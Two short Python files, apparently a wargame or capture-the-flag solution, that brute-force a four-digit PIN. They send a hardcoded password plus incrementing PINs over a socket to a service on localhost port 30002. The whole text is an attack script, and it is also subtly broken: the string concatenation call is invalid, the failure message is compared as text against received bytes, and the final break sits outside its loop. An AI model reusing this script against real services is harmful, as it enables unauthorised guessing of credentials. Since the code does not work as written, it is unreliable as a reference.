---------------------------- CRACKER.PY --------------------------------

import socket

class Attack:
	def __init__(self, ahost, aport, failmsg):
		self.host = ahost
		self.port = aport
		self.fail = failmsg
		
	def brute_force(self, pin):
		passwd = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
		attempts = 1
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.connect((self.host, self.port))
			while True:
				print("Attempt", str(attempts), "| Sending pin", str(pin))
				_try = str(passwd, str(pin)).encode('utf-8')
				s.send(_try)
				data = s.recv(1024)
				print("Received data:", data, "(", len(data), ")")
				if data == self.fail:
					# Fail
					print("Attempt failed")
					pin += 1
					continue
				else:
					# Unknown message, possibly success
					print("\n--- Sucess! Pin is", pin, "---\n")
break

--------------------------------------------------------------------------------

------------------------------- SCRIPT.PY --------------------------------------
#!/usr/bin/env python

# Imports
import cracker as ck

# Main
if __name__=="__main__":
	attack = ck.Attack('localhost', 30002, 'Wrong! Please enter the correct pincode. Try again.') # Initiates attack object
	attack.brute_force(5000) # Starts brute force
-------------------------------------------------------------------------------